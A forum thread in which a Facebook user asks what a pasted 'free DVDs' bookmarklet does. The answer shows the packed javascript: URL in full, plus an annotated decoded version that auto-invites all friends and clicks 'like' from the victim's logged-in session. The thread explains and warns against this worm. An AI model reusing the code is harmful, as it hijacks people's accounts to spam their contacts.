A 'friend' on Facebook suggested I become a fan of some video library to get free DVDs. On their fan page, under the 'FREE DVDs' tab, there was some code that users were asked to copy and paste into the address bar.
I am wondering if anyone knows what this code would do just by looking at it. I guess I need to be logged into Facebook for it to work, but I don't want to paste it in case it is malicious and spams all my other Facebook friends.
Can anyone tell?
// Sample under analysis: a `javascript:` URL that the page asks visitors to paste into the address bar.
// Pasted that way it would run inside whatever page is open at the time, with that page's logged-in session.
// The five leading assignments store element ids; everything after them is a p.a.c.k.e.r-style packed string
// that the eval(...) call decodes and then executes.
// To read it, decode the packed string statically instead of running it in a logged-in browser.
javascript:(function(){a='app113639355344735_ncpCAE';b='app113639355344735_RWwtnR';WGOEjW='app113639355344735_WGOEjW';zsbTwe='app113639355344735_zsbTwe';wwEggB='app113639355344735_wwEggB';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|wwEggB|fs|SocialGraphManager|zsbTwe|WGOEjW|||||||'.split('|'),0,{}))})();
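This is compressed using p.a.c.k.e.r. You can use a tool like http://jsbeautifier.org/ to unpack it; paste the code into the tool rather than into the address bar of a logged-in Facebook tab, so that you read the decoded script instead of running it against your own session.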
// Unpacked form of the packed bookmarklet, annotated for analysis.
// Nothing here asks for confirmation: every step below runs as soon as the code is pasted and executed.

// Ids of elements the script expects to find on the page it is pasted into.
// The shared `app113639355344735_` prefix presumably identifies the hosting Facebook app tab (not verifiable from this listing).
// None of these names is declared with var/let/const.
a = 'app113639355344735_ncpCAE';
b = 'app113639355344735_RWwtnR';
WGOEjW = 'app113639355344735_WGOEjW';
zsbTwe = 'app113639355344735_zsbTwe';
wwEggB = 'app113639355344735_wwEggB';
d = document;
// Hide the element whose id is stored in wwEggB.
d['getElementById'](wwEggB)['style']['visibility'] = 'hidden';
// Copy the `value` of element b into element a as HTML, i.e. markup kept in a form field is injected into the page.
d['getElementById'](a)['innerHTML'] = d['getElementById'](b)['value'];
// Look up the two page controls the script will click on the user's behalf.
s = d['getElementById']('suggest');
m = d['getElementById']('likeme');
// Build a synthetic click event (bubbling and cancelable) and fire it on the 'suggest' element.
// The accompanying answer describes the result as opening the invite dialog.
c = d['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
s['dispatchEvent'](c);
// After 5000 ms: call select_all() on the page-provided global `fs` (not defined in this listing).
// Per the accompanying answer this selects every friend in the dialog.
setTimeout(function () {
fs['select_all']()
}, 5000);
// After 5000 ms: submit the form 'sgm_invite_form' to the invite endpoint through the page's own
// SocialGraphManager object, so the request is made from the user's logged-in session.
setTimeout(function () {
SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
}, 5000);
// After 5000 ms: fire the same synthetic click on the 'likeme' element, then replace the content of
// element zsbTwe with the `value` of element WGOEjW (a second field-to-innerHTML copy).
setTimeout(function () {
m['dispatchEvent'](c);
d['getElementById'](zsbTwe)['innerHTML'] = d['getElementById'](WGOEjW)['value']
}, 5000);
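As you can see, this opens up an invite dialog, selects all friends and issues a click event so as to run the invitation. It also dispatches the same synthetic click on the `likeme` element. Because the code is pasted into the address bar, all of this runs inside your own logged-in session - in short, it's a worm.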